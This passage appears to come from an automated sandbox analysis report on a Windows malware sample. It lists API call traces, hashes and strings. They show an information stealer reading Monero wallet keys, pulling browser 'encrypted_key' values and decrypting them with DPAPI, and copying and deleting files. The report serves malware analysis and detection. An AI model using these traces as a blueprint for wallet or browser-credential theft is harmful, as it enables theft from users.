                          • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00DE12F5
                          • RegCloseKey.ADVAPI32(?), ref: 00DE12FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: 347fee172138133ea493035e84db50dff061a1cd8c7d4fc61951048300d8326e
                          • Instruction ID: c31e0a8df0abaa9e233cad42ab802e30a7175c24ac536780b93c80fe4df52ac5
                          • Opcode Fuzzy Hash: 347fee172138133ea493035e84db50dff061a1cd8c7d4fc61951048300d8326e
                          • Instruction Fuzzy Hash: AD011DB9B40208FBDB24DFE0DC49FAEB7B8FB48701F108159FA4597284DA759A018B60
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: String___crt$Type
                          • String ID:
                          • API String ID: 2109742289-3916222277
                          • Opcode ID: 125ecb3d635e4ff94a4576300da96bcddad17f72e516cbb62038592c750a1301
                          • Instruction ID: 8aee07532886655cfbb0e18d5f7c7aa1de1e5bd1c5f415532c55ba9e65f897cf
                          • Opcode Fuzzy Hash: 125ecb3d635e4ff94a4576300da96bcddad17f72e516cbb62038592c750a1301
                          • Instruction Fuzzy Hash: C541F6B111075C5EDB218B24CE84FFB7BE99F45705F1894E8EACA86182E2719A94CF30
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00DF6663
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00DF6726
                          • ExitProcess.KERNEL32 ref: 00DF6755
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                          • String ID: <
                          • API String ID: 1148417306-4251816714
                          • Opcode ID: 4b85860e5a04faa85828634e2081da7c2e58f0b2f1b13c2116b88843e069b3d0
                          • Instruction ID: eaea38f9a2cad76c5e96ffe745a4c15e11ac327263ecd3edf6d24ad713b7caaa
                          • Opcode Fuzzy Hash: 4b85860e5a04faa85828634e2081da7c2e58f0b2f1b13c2116b88843e069b3d0
                          • Instruction Fuzzy Hash: E3310AB1901218AADB24EB54DC91BEE7778EF44300F808199F30966191DFB56B48CF7A
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00E00E28,00000000,?), ref: 00DF882F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DF8836
                          • wsprintfA.USER32 ref: 00DF8850
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          • Opcode ID: 6e0e4ecb755c00295438930d2f0f2a282c3e7f3a3d053f78b3ba32c6f67aead8
                          • Instruction ID: 77d5cc744c96cfec6a11752746254147416178e706ba7440c2b8e31acdfd5235
                          • Opcode Fuzzy Hash: 6e0e4ecb755c00295438930d2f0f2a282c3e7f3a3d053f78b3ba32c6f67aead8
                          • Instruction Fuzzy Hash: 3C2133B1F40208EFDB24DF94DD45FAEB7B8FB48711F204119F605A7684CB7999008BA1
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00DF951E,00000000), ref: 00DF8D5B
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DF8D62
                          • wsprintfW.USER32 ref: 00DF8D78
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesswsprintf
                          • String ID: %hs
                          • API String ID: 769748085-2783943728
                          • Opcode ID: 0b1b56de4916ac1b6a02cc04570240e3ae51afa4adf4af32d8ad99ce0931871d
                          • Instruction ID: 1b0e725390b8b74671ef17ac4fc932e442e87b5a7eeaf470ae395b1bb6f23051
                          • Opcode Fuzzy Hash: 0b1b56de4916ac1b6a02cc04570240e3ae51afa4adf4af32d8ad99ce0931871d
                          • Instruction Fuzzy Hash: F6E08CB0B40208FBD724DF94DC0AE6977B8EB04702F104095FE4A97680DEB69E008BA5
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                            • Part of subcall function 00DF8B60: GetSystemTime.KERNEL32(00E00E1A,0083FC00,00E005AE,?,?,00DE13F9,?,0000001A,00E00E1A,00000000,?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DF8B86
                            • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                            • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00DEA2E1
                          • lstrlen.KERNEL32(00000000,00000000), ref: 00DEA3FF
                          • lstrlen.KERNEL32(00000000), ref: 00DEA6BC
                            • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                          • DeleteFileA.KERNEL32(00000000), ref: 00DEA743
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 86bbecd727f6926a560c3337923cac820a5a59ab6645df2d526272531e79aae9
                          • Instruction ID: 3a90e1082d0ba82b479ca769ea72f42bc577f3e666d0cb0dc85711e654eea5a1
                          • Opcode Fuzzy Hash: 86bbecd727f6926a560c3337923cac820a5a59ab6645df2d526272531e79aae9
                          • Instruction Fuzzy Hash: 8EE1FBB291011C9ACB14FBA8DC92EFE7338EF14340F51C169F61A76095EE746A49CB72
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                            • Part of subcall function 00DF8B60: GetSystemTime.KERNEL32(00E00E1A,0083FC00,00E005AE,?,?,00DE13F9,?,0000001A,00E00E1A,00000000,?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DF8B86
                            • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                            • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00DED481
                          • lstrlen.KERNEL32(00000000), ref: 00DED698
                          • lstrlen.KERNEL32(00000000), ref: 00DED6AC
                          • DeleteFileA.KERNEL32(00000000), ref: 00DED72B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: c9f1af44e29dd47cbbbdcdc94c602c5034321782d3659a07a35c767b23a27f38
                          • Instruction ID: 35049f0ea5961abe0890f602429eb4003559a612b89bd1cb4fb59979a702bfb2
                          • Instruction Fuzzy Hash: AF910FB191011C9ACB14FBA8DC96DFE7338EF14300F51C169F61AA6095EF746A09CB72
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                            • Part of subcall function 00DF8B60: GetSystemTime.KERNEL32(00E00E1A,0083FC00,00E005AE,?,?,00DE13F9,?,0000001A,00E00E1A,00000000,?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DF8B86
                            • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                            • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00DED801
                          • lstrlen.KERNEL32(00000000), ref: 00DED99F
                          • lstrlen.KERNEL32(00000000), ref: 00DED9B3
                          • DeleteFileA.KERNEL32(00000000), ref: 00DEDA32
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 757336a909d840892d96cf035e55d6499dd52495af3dbb58fbaf7f99443e978d
                          • Instruction ID: 894a40f8a613dd5edcddb581b598285d71ef63565b32c5320e311f8b7f7c0b70
                          • Instruction Fuzzy Hash: 12810FB191011C9ACB14FBA8DC96DFE7338EF54340F55C129F60AA6095EF746A09CB72
                          APIs
                            • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                            • Part of subcall function 00DE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DE99EC
                            • Part of subcall function 00DE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00DE9A11
                            • Part of subcall function 00DE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00DE9A31
                            • Part of subcall function 00DE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00DE148F,00000000), ref: 00DE9A5A
                            • Part of subcall function 00DE99C0: LocalFree.KERNEL32(00DE148F), ref: 00DE9A90
                            • Part of subcall function 00DE99C0: CloseHandle.KERNEL32(000000FF), ref: 00DE9A9A
                            • Part of subcall function 00DF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00DF8E52
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                            • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                            • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                          • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00E01580,00E00D92), ref: 00DEF54C
                          • lstrlen.KERNEL32(00000000), ref: 00DEF56B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          Similarity
                          • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                          • String ID: ^userContextId=4294967295$moz-extension+++
                          • API String ID: 998311485-3310892237
                          • Opcode ID: 821a804907ddcc4911ed429f3f96c8dc5bb78061dad11b94c5f54b2a89065583
                          • Instruction ID: a897a1def379ebb90cdc72012dcabf322579de12dbf2e2170a577c42cbbc86c2
                          • Instruction Fuzzy Hash: 2B510DB190010CAADB04FBA8DC96DFD7338EF54340F45C528FA1A67195EE746A09CBB2
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          • Opcode ID: a3c2da55e72b7ba0d2e93ae8009169cd3f31fed4c01efb48d69f050f577721f2
                          • Instruction ID: afc0eba301d3169d1c6c90418dcd24f7b2d31ff37b9aec7abf42ca0bc9df9e6b
                          • Instruction Fuzzy Hash: 68410BB1D1020EEBCB04EFA8D845AFEB774EF44304F15C418E616B6290DB75AA49CBB1
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DE99EC
                            • Part of subcall function 00DE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00DE9A11
                            • Part of subcall function 00DE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00DE9A31
                            • Part of subcall function 00DE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00DE148F,00000000), ref: 00DE9A5A
                            • Part of subcall function 00DE99C0: LocalFree.KERNEL32(00DE148F), ref: 00DE9A90
                            • Part of subcall function 00DE99C0: CloseHandle.KERNEL32(000000FF), ref: 00DE9A9A
                            • Part of subcall function 00DF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00DF8E52
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00DE9D39
                            • Part of subcall function 00DE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00DE4EEE,00000000,00000000), ref: 00DE9AEF
                            • Part of subcall function 00DE9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00DE4EEE,00000000,?), ref: 00DE9B01
                            • Part of subcall function 00DE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00DE4EEE,00000000,00000000), ref: 00DE9B2A
                            • Part of subcall function 00DE9AC0: LocalFree.KERNEL32(?,?,?,?,00DE4EEE,00000000,?), ref: 00DE9B3F
                            • Part of subcall function 00DE9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00DE9B84
                            • Part of subcall function 00DE9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00DE9BA3
                            • Part of subcall function 00DE9B60: LocalFree.KERNEL32(?), ref: 00DE9BD3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          Similarity
                          • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2100535398-738592651
                          • Opcode ID: d387672acf483ddcc90e0a5f4de149cc2d7d4522a0c4e736a761ba2236678938
                          • Instruction ID: 13277152bc85203aca9750fb35af9bb60adc764781b45b66a908bf37aaed1a83
                          • Instruction Fuzzy Hash: 74315EB6D1121DABCF04EFE5DC95AEEB7B8EF48304F144518EA05A7241EB349A04CBB1
                          APIs
                          • CreateFileA.KERNEL32(00DF3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00DF3AEE,?), ref: 00DF92FC
                          • GetFileSizeEx.KERNEL32(000000FF,00DF3AEE), ref: 00DF9319
                          • CloseHandle.KERNEL32(000000FF), ref: 00DF9327
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          Similarity
                          • API ID: File$CloseCreateHandleSize
                          • String ID:
                          • API String ID: 1378416451-0
                          • Opcode ID: cc9ce9e6ee6ddae8804b00417948868fff04fa46de1f709363e7083bd5395ac0
                          • Instruction ID: 6d957af6572b69ffdae4ffa927f33fcce5df715b20d072493b2048bbf28636ad
                          • Instruction Fuzzy Hash: A2F06934F00208FBDB20DEA4DC18FAEB7F9AB48310F21C254EA91A72C4DA7596008B50
                          APIs
                          • __getptd.LIBCMT ref: 00DFC74E
                            • Part of subcall function 00DFBF9F: __amsg_exit.LIBCMT ref: 00DFBFAF
                          • __getptd.LIBCMT ref: 00DFC765
                          • __amsg_exit.LIBCMT ref: 00DFC773
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 00DFC797
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
                          • Opcode ID: 71ca922e7d8a71707d3b51c24646a8e1095c9e7aeec4134f5d5dec8c60337b0d
                          • Instruction ID: 7fff97b43733d334436f56b55935f516305b2def4e0f9bd117f504ff066576ac
                          • Instruction Fuzzy Hash: 98F0907291430C9BD720BBB89D06B7A33A0EF00735F2BD14AF744AA1D2DB645990DE76
                          APIs
                            • Part of subcall function 00DF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00DF8E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00DF4F7A
                          • lstrcat.KERNEL32(?,00E01070), ref: 00DF4F97
                          • lstrcat.KERNEL32(?,00838A68), ref: 00DF4FAB
                          • lstrcat.KERNEL32(?,00E01074), ref: 00DF4FBD
                            • Part of subcall function 00DF4910: wsprintfA.USER32 ref: 00DF492C
                            • Part of subcall function 00DF4910: FindFirstFileA.KERNEL32(?,?), ref: 00DF4943
                            • Part of subcall function 00DF4910: StrCmpCA.SHLWAPI(?,00E00FDC), ref: 00DF4971
                            • Part of subcall function 00DF4910: StrCmpCA.SHLWAPI(?,00E00FE0), ref: 00DF4987
                            • Part of subcall function 00DF4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00DF4B7D
                            • Part of subcall function 00DF4910: FindClose.KERNEL32(000000FF), ref: 00DF4B92
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          Similarity
                          • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                          • String ID:
                          • API String ID: 2667927680-0
                          • Opcode ID: 37bb4a1bbedef7642e9d99fe36edaee88e0e34a94c304446006d1c022e33e7bd
                          • Instruction ID: 4449cc0008ea4fe21374c391efa08b5fa422ba5b740b157a115c0b35c53724e8
                          • Instruction Fuzzy Hash: BD218B7AA00308ABC774FB60DC46EEE733CEB54300F108554F69997585DEB996C88BB1